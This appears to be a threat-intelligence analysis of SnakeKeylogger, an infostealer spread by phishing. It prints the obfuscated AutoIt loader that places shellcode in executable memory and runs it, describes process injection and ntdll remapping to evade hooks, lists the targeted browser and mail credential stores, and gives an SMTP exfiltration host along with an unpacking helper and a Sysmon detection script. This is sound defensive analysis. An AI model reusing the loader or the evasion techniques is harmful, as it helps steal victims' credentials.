Efficient Distribution of SnakeKeylogger Malware Through Email


  • Short Summary: AhnLab Security Intelligence Center has reported the distribution of SnakeKeylogger malware via phishing emails. This Infostealer, developed in .NET, is delivered inside an AutoIt-compiled executable, is injected into a legitimate process by shellcode, and sends the stolen data to the threat actor over SMTP; the family also supports FTP and Telegram as exfiltration channels.
  • Key Points:
    • SnakeKeylogger is an Infostealer type of malware.
    • It is distributed via phishing emails with executable attachments.
    • The malware is composed of an obfuscated AutoIt script and two binary files.
    • Supported exfiltration channels are SMTP, FTP, and Telegram; the analyzed sample uses only SMTP.
    • The malware can inject itself into legitimate processes to avoid detection.
    • Exfiltrated data includes login credentials, web data, and more from various applications.
    • Threat actors can customize the SnakeKeylogger to include or exclude features.
    • Users are advised to be cautious with unknown emails and executable attachments.

MITRE ATT&CK TTPs – created by AI

  • Technique Name: Credentials from Password Stores (T1555)
    • Procedure: Collects saved account credentials from browsers (T1555.003, Credentials from Web Browsers), email clients, and FileZilla.
  • Technique Name: Process Injection (T1055)
    • Procedure: Shellcode decrypts the SnakeKeylogger payload and injects it into a legitimate process (RegSvcs.exe or svchost.exe) to evade detection.
  • Technique Name: Exfiltration Over Alternative Protocol (T1048)
    • Procedure: Sends the collected data to the threat actor over SMTP.
  • Technique Name: Phishing: Spearphishing Attachment (T1566.001)
    • Procedure: Distributes the malware as an executable attachment to a phishing email.


AhnLab SEcurity intelligence Center (ASEC) has recently identified cases where the SnakeKeylogger malware is being distributed via email. SnakeKeylogger is an Infostealer developed in .NET, and it is characterized by its choice of exfiltration channels: SMTP (email), FTP, or Telegram.

Figure 1. Phishing email

The initial distribution is typically done in the form of an email, as shown in Figure 1. It grabs the attention of recipients with relatively sensitive topics such as financial matters and prompts them to run the attached executable file (BankTran.exe).

BankTran.exe is a PE built with the AutoIt compiler, that is, an AutoIt script wrapped in an executable. Extracting the embedded AutoIt resources yields three files: one AutoIt script and two binaries. Their names and roles are as follows:

File name       Type                                   Role
-------------   ------------------------------------   ---------------------------------
{Unknown}.au3   Obfuscated AutoIt script (loader)      Loads teres
teres           Shellcode (injector)                   Decrypts and injects quinquenniad
quinquenniad    .NET PE (encrypted SnakeKeylogger)     SnakeKeylogger malware

Table 1. Types and roles of extracted files

This post will now examine the process of SnakeKeylogger being injected into legitimate processes, starting from the AutoIt script.

Figure 2. The extracted AutoIt script

#NoTrayIcon
; Drop the two embedded binaries into %Temp%
FileInstall("quinquenniad", @TempDir & "\quinquenniad", 1)
FileInstall("teres", @TempDir & "\teres", 1)
; Read teres and strip the embedded marker string from its contents
Global $v30rutgry = Execute('FileRead(FileOpen(@TempDir & "\teres"))')
$v30rutgry = Execute('StringReplace($V30rUtgRy, "1A6E71D4810309FDFC6D43D3E9A6A999A1918E3376ACA2EEC40F44C89B681ADD6AA0260BDF66FE84DA", "")')
; Decoded (see Table 2): DllCall("Kernel32", "ptr", "VirtualAlloc", "dword", 0, "dword", BinaryLen($v30rutgry), "dword", 0x3000, "dword", 0x40)
$t33106ba = DllCall(c30te6f("x/)84)2w", "AA"), c30te6f("8:6", "AA"), c30te6f("'928%3:2-2", "AA"), _
    c30te6f("*;38*", "AA"), c30te6f("v", "AA"), _
    c30te6f("*;38*", "AA"), BinaryLen($v30rutgry), _
    c30te6f("*;38*", "AA"), c30te6f("vvvw>v", "AA"), _
    c30te6f("*;38*", "AA"), c30te6f("vv>z", "AA"))
$t33106ba = $t33106ba[0]
; Build a "byte[N]" struct over the allocated memory and copy the shellcode into it
$z374vm4oj = DllStructCreate(c30te6f("f):=(", "AA") & BinaryLen($v30rutgry) & c30te6f("!", "AA"), $t33106ba)
DllStructSetData($z374vm4oj, 1, $v30rutgry)
; Transfer control into the shellcode at base + 9136 (decoded return type: "int")
DllCallAddress(c30te6f(":4-", "AA"), $t33106ba + 9136)

The AutoIt script is heavily obfuscated, but the strings recovered by applying its decryption routine (c30te6f) are listed below.
They show that the script calls VirtualAlloc(0, BinaryLen(teres), 0x3000, 0x40), that is, MEM_COMMIT | MEM_RESERVE with PAGE_EXECUTE_READWRITE, copies the shellcode into that RWX buffer through a byte[N] DllStruct, and then calls into the buffer at offset 9136 with DllCallAddress.

Decrypted function and argument values    Result
---------------------------------------   ------------
c30te6f("x/)84)2w", "AA")                 Kernel32
c30te6f("8:6", "AA")                      ptr
c30te6f("'928%3:2-2", "AA")               VirtualAlloc
c30te6f("*;38*", "AA")                    dword
c30te6f("v", "AA")                        0
c30te6f("vvvw>v", "AA")                   0x3000
c30te6f("vv>z", "AA")                     0x40
c30te6f("f):=(", "AA")                    byte [
c30te6f("!", "AA")                        ]
c30te6f(":4-", "AA")                      int

Table 2. Decrypted strings

In other words, the memory returned by VirtualAlloc receives a copy of teres, the shellcode dropped in the %Temp% directory, and execution is then transferred into it.
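The following script, an added example and not code from the ASEC post or from the malware, reproduces on raw bytes what the deobfuscated loader does before calling the shellcode: it removes every occurrence of the embedded marker string (AutoIt's StringReplace is case-insensitive by default and removes all matches), treats the remainder as the buffer written to the RWX allocation, and locates the entry point the loader calls at base + 9136. The teres blob used here is constructed for illustration; an analyst would pass in the real file from %Temp% and hand the stripped buffer to a disassembler with the entry offset set.

```python
"""Reproduce the AutoIt loader's preparation of the dropped 'teres' shellcode.

Added example; not the malware's or ASEC's code. The blob below is constructed.
"""
import re

# Marker the loader removes with StringReplace() (copied from the script on the page).
MARKER = b"1A6E71D4810309FDFC6D43D3E9A6A999A1918E3376ACA2EEC40F44C89B681ADD6AA0260BDF66FE84DA"

# Arguments of the decoded DllCall: VirtualAlloc(0, BinaryLen, 0x3000, 0x40)
ALLOCATION_TYPE = 0x3000
PROTECT = 0x40
ENTRY_OFFSET = 9136          # DllCallAddress("int", $base + 9136)

MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_FLAGS = {0x40: "PAGE_EXECUTE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x04: "PAGE_READWRITE"}


def describe_alloc(allocation_type: int = ALLOCATION_TYPE, protect: int = PROTECT) -> list:
    """Expand the numeric VirtualAlloc arguments into their Win32 flag names."""
    names = [name for bit, name in MEM_FLAGS.items() if allocation_type & bit]
    names.append(PAGE_FLAGS.get(protect, hex(protect)))
    return names


def strip_marker(blob: bytes, marker: bytes = MARKER) -> bytes:
    """Remove all occurrences of the marker, case-insensitively, like AutoIt StringReplace()."""
    return re.sub(re.escape(marker), b"", blob, flags=re.IGNORECASE)


def locate_entry(shellcode: bytes, entry_offset: int = ENTRY_OFFSET) -> bytes:
    """Return the first 16 bytes at the call target. A buffer shorter than the
    offset means the marker was not stripped or the wrong file was supplied."""
    if entry_offset >= len(shellcode):
        raise ValueError(f"buffer is {len(shellcode)} bytes; entry offset {entry_offset} is outside it")
    return shellcode[entry_offset:entry_offset + 16]


# Constructed sample: filler, two copies of the marker (one lower-cased), and a
# recognisable x86 prologue (push ebp; mov ebp, esp) placed so that it lands at
# offset 9136 once both markers are gone.
SAMPLE_TERES = (b"\x90" * 100 + MARKER + b"\xcc" * 9036
                + b"\x55\x8b\xec" + b"\x00" * 61 + MARKER.lower())


def unpack(blob: bytes = SAMPLE_TERES) -> dict:
    """Run the loader's steps and summarise what the shellcode entry looks like."""
    shellcode = strip_marker(blob)
    return {
        "size": len(shellcode),
        "entry_offset": ENTRY_OFFSET,
        "entry_bytes": locate_entry(shellcode).hex(),
        "allocation": describe_alloc(),
    }


if __name__ == "__main__":
    print(unpack())
```

The size check in locate_entry matters in practice: if the marker survives (for example because the file was read through a text-mode conversion that altered bytes), the computed entry point no longer lines up with the code the loader actually jumps to.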

Figure 3. teres (ShellCode) written into the space allocated by VirtualAlloc

The shellcode is responsible for injecting SnakeKeylogger into a legitimate process.
SnakeKeylogger is stored encrypted in the quinquenniad file in the same %Temp% directory. The candidate host processes are listed below; the shellcode selects one of them depending on the system environment.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
C:\Windows\System32\svchost.exe

As shown in Figure 4, the encrypted quinquenniad file is decrypted within the ShellCode using a specific key.

Figure 4. Decrypted SnakeKeylogger (quinquenniad)

During the injection process, the shellcode was observed to manually map its own copy of ntdll.dll and call the native APIs from that copy rather than from the ntdll.dll already loaded in the process.
This technique is commonly employed by threat actors to bypass anti-malware products that place user-mode hooks in the loaded ntdll.dll, since the freshly mapped copy carries no hooks. Related methods have been discussed in previous ASEC Blog posts [1][2].

Figure 5. ShellCode manually mapping ntdll.dll

The shellcode then creates the chosen host process, injects the decrypted SnakeKeylogger into it, and the stealer becomes active inside that process.

During analysis, it was found that, despite the malware's name, the keylogging feature exists only in the code and is never activated. This suggests that features can be selected when the malware is built; in other words, the threat actor can customize SnakeKeylogger and produce variants with different feature sets. The version discussed here therefore operates only as an information stealer. It exfiltrates data such as account credentials from software present on the system, including email clients, browsers, FTP clients, and messaging applications.

The table below lists the information that is exfiltrated by SnakeKeylogger as it operates.

Exfiltrated information: Browser
  Detailed information: Login Data, Web Data, History, Cookies, and Top Sites
  Targeted programs: Amigo, Xpom, Kometa, Nichrome, Chrome, CocCoc, QQ Browser, Orbitum, Slimjet, Iridium, Vivaldi, Iron, Chromium, Ghost Browser, Cent Browser, Xvast, Chedot, Superbird, 360 Browser (English, Chinese), Comodo, Brave, Torch, UCBrowser, Blisk, Epic, Avast Browser, Kinza, BlackHawk, Citrio, Urn, Coowon, 7Star, QIP Surf, Sleipnir5, Chrome Canary, ChromePlus, Sputnik, Falkon, Edge, Opera, Liebao, Slim Browser, Firefox, SeaMonkey, IceDragon, CyberFox, PaleMoon, and WaterFox

Exfiltrated information: Email
  Detailed information: IMAP password, HTTP password, POP3 password, SMTP password, and account info
  Targeted programs: Outlook, Foxmail, Thunderbird, and PostBox

Exfiltrated information: FTP
  Detailed information: Host, port, user, and password
  Targeted programs: FileZilla

Exfiltrated information: Etc.
  Detailed information: db, log, etc.
  Targeted programs: Pidgin, Discord

Table 3. Exfiltrated data

The collected information is sent to the threat actor via SMTP. Code paths for transmission over Telegram and plain HTTP are also present in the sample but are not used. This, too, points to the build-time customization options of SnakeKeylogger mentioned earlier.

Figure 6. Using SMTP to transmit exfiltrated data to the threat actor
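The chain described above (loader in a user-writable path, two files dropped into %Temp%, a RegSvcs.exe or svchost.exe child, a remote thread into that child, and the child then speaking SMTP) is visible in ordinary endpoint telemetry. The script below is an added example, not code from the ASEC post, that scores Sysmon-style events for exactly that chain. The events are constructed dictionaries whose field names mirror Sysmon event IDs 1 (ProcessCreate), 11 (FileCreate), 8 (CreateRemoteThread), and 3 (NetworkConnect); the GUIDs, user name, the MAIL_CLIENTS allow-list, and the benign Outlook traffic are assumptions made for the example, while the injection-target paths and the SMTP host name come from the page.

```python
"""Score Sysmon-style telemetry for the SnakeKeylogger delivery chain on this page.

Added example, not the ASEC post's code. Events are constructed; see lead-in.
"""
import ntpath
from collections import defaultdict

# Host processes the shellcode injects into (paths from the page), lower-cased.
INJECTION_TARGETS = {
    r"c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe",
    r"c:\windows\microsoft.net\framework\v2.0.50727\regsvcs.exe",
    r"c:\windows\system32\svchost.exe",
}
SMTP_PORTS = {25, 465, 587}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}   # assumption: processes expected to speak SMTP
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\downloads\\")


def _norm(path):
    return (path or "").lower()


def analyze(events):
    """Return one finding per process that exhibits the loader chain."""
    image_of, parent_of = {}, {}
    for ev in events:                      # pass 1: rebuild the process tree
        if ev["EventID"] == 1:
            image_of[ev["ProcessGuid"]] = _norm(ev["Image"])
            parent_of[ev["ProcessGuid"]] = ev.get("ParentProcessGuid")

    stages = defaultdict(set)              # process GUID -> matched chain stages
    for ev in events:                      # pass 2: match stages
        eid = ev["EventID"]
        if eid == 1:
            guid = ev["ProcessGuid"]
            if image_of[guid] in INJECTION_TARGETS and parent_of[guid]:
                stages[parent_of[guid]].add("spawns_injection_target")
        elif eid == 11 and "\\temp\\" in _norm(ev["TargetFilename"]):
            stages[ev["ProcessGuid"]].add("drops_to_temp")
        elif eid == 8 and _norm(ev["TargetImage"]) in INJECTION_TARGETS:
            stages[ev["SourceProcessGuid"]].add("remote_thread_into_target")
        elif eid == 3 and int(ev["DestinationPort"]) in SMTP_PORTS:
            img = _norm(ev["Image"])
            if ntpath.basename(img) in MAIL_CLIENTS:
                continue                   # a mail client on a mail port is expected
            parent = parent_of.get(ev["ProcessGuid"])
            if img in INJECTION_TARGETS and parent:
                stages[parent].add("child_smtp_connect")   # credit the loader, not the hollowed host
            else:
                stages[ev["ProcessGuid"]].add("smtp_from_non_mail_process")

    findings = []
    for guid, hits in stages.items():
        image = image_of.get(guid, "")
        from_user_path = any(marker in image for marker in USER_WRITABLE)
        if len(hits) >= 3 or (from_user_path and "spawns_injection_target" in hits):
            findings.append({"process_guid": guid, "image": image, "stages": sorted(hits)})
    return findings


# Constructed sample telemetry (field names mirror Sysmon; values are made up except the paths and host from the page).
TEMP = r"C:\Users\victim\AppData\Local\Temp"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
OUTLOOK = r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{O}", "Image": OUTLOOK},
    {"EventID": 1, "ProcessGuid": "{A}", "ParentProcessGuid": "{O}",
     "Image": r"C:\Users\victim\Downloads\BankTran.exe"},
    {"EventID": 11, "ProcessGuid": "{A}", "TargetFilename": TEMP + r"\teres"},
    {"EventID": 11, "ProcessGuid": "{A}", "TargetFilename": TEMP + r"\quinquenniad"},
    {"EventID": 1, "ProcessGuid": "{B}", "ParentProcessGuid": "{A}", "Image": REGSVCS},
    {"EventID": 8, "SourceProcessGuid": "{A}", "TargetProcessGuid": "{B}", "TargetImage": REGSVCS},
    {"EventID": 3, "ProcessGuid": "{B}", "Image": REGSVCS,
     "DestinationHostname": "mail.tradolgt.com", "DestinationPort": 587},
    # benign noise: the user's mail client on the SMTP submission port
    {"EventID": 3, "ProcessGuid": "{O}", "Image": OUTLOOK,
     "DestinationHostname": "smtp.corp.example", "DestinationPort": 587},
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

Attributing the SMTP connection to the parent rather than to RegSvcs.exe is the point of the two-pass design: after injection the host process is a signed Microsoft binary, so a rule keyed on the connecting image alone would either miss it or flag every RegSvcs.exe, while tying it back to the process that dropped files into %Temp% and opened the remote thread yields a single high-confidence finding.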

Email has long been a common attack vector, so caution is warranted when handling messages from unknown senders. In particular, an attached executable (.exe) file should not be run.

File Detection
– Trojan/Win.Autoit.XG85
– Trojan/Win.SnakeKeylogger.R433068
– Trojan/Win.SnakeKeylogger.C5326084
– Trojan/AU3.Loader
– Trojan/BIN.Agent
– Trojan/BIN.Shellcode

MD5
– 0a6332f1bc58f389e778016d89f411fd
– 3e473d16c81dd66fee6f02537b601626
– 7b81359e1bd2a67c1165dde435ea6d88
– cdeddd67555c870a0a8602cf341a60cb
– e109a03fbb1300f771e86244aea390d2

URL
– http[:]//mail[.]tradolgt[.]com[:]587/

Source : https://asec.ahnlab.com/en/82172/